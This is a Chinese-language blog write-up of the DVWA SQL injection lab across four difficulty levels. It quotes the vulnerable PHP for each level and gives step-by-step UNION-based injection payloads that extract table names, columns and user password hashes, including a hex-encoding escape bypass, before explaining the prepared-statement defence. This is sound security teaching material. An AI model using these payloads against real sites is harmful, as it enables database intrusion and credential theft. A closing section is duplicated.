2020-12-06-DVWA之sql
layout: post
title: DVWA之sql-injection
subtitle: 學習學習
date: 2020-12-06
author: lll-yz
header-img: img/post-bg-coffee.jpg
catalog: true
tags:
- DVWA
SQL Injection
low
<?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } mysqli_close($GLOBALS["___mysqli_ston"]); } ?>
沒有對使用者輸入做任何限制。
1.首先嚐試注入型別,輸入 1’ ,提示
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
說明為字元型注入,’ 閉合。
2.輸入 1’ # ,回顯正確。這個是採用註釋掉後面 ‘ 的方式。
也可以 1’ or ‘1’='1 閉合後面單引號,同樣可以達到目的。
3.判斷欄位數,輸入 1’ order by x # (x=2,3) 得到欄位數為2。
4.查詢回顯欄位,輸入 -1’ union select 1,2 # ,得到回顯欄位
5.查詢資料庫名,輸入 -1’ union select 1,database() # ,
得到資料庫為 dvwa。
6.-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) #
查詢表名:
7.-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’) #
查詢列名:
8.-1’ union select 1,(select group_concat(user,’,’,password) from dvwa.users) #
得到使用者與密碼:
medium
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
與low相比,增加了mysqli_real_escape_string函式對 特殊字元
- \x00
- \n
- \r
- \
- ’
- "
- \x1a
進行了轉義。且改為了下拉選單,防止在輸入框中直接注入。
我們可以在burp抓包:
1.判斷注入型別。
報錯:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\''
at line 1
得出位數值型注入。這下mysqli_real_escape_string函式對敏感字元進行的過濾顯得比較雞肋了,數值型注入id不需要用 ',"等進行閉合,直接注入即可。
2.判斷欄位數。
id=1 order by 2&Submit=Submit 回顯正常。
id=1 order by 3&Submit=Submit 錯誤,說明有2欄位。
3.判斷回顯。
4.查詢資料庫。
id=-1 union select 1,database()&Submit=Submit
5.查詢表名。
id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())&Submit=Submit
6.查詢資料。
id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)&Submit=Submit
查詢失敗。 syntax to use near '\'users\')'
at line 1 因為 ’ 被轉義了。
可以將users轉化為16進位制繞過。
id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)&Submit=Submit
成功。
7.查詢資料。
id=-1 union select 1,(select group_concat(user,password) from dvwa.users)&Submit=Submit
high
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
與medium相比,high級別多了一個limit 1,限制只輸出一個結果。但可以通過#將其註釋掉。
後面多了一個#註釋。
步驟同low基本(查詢列名時table_name=‘users’ 這裡使用16進位制繞過一下)
impossible
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
$row = $data->fetch();
// Make sure only 1 result is returned
if( $data->rowCount() == 1 ) {
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
程式碼解讀:
user_token: 使用者token。
is_numeric(): 檢測變數是否為數字或數字字串。
prepare(): 準備要執行的SQL語句,並返回一個PDOStatement物件。
bindParam(): 繫結一個引數指定的變數名。
execute(): 方法返回物件。
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
程式碼解讀:
**user_token:** 使用者token。
**is_numeric():** 檢測變數是否為數字或數字字串。
**prepare():** 準備要執行的SQL語句,並返回一個PDOStatement物件。
**bindParam():** 繫結一個引數指定的變數名。
**execute():** 方法返回物件。
impossible級別程式碼採用了PDO技術,劃清了程式碼與資料的界限,有效防禦SQL注入,同時只有返回的查詢結果數量為一時,才會成功輸出,Anti-CSRF token機制的加入進一步提高了安全性。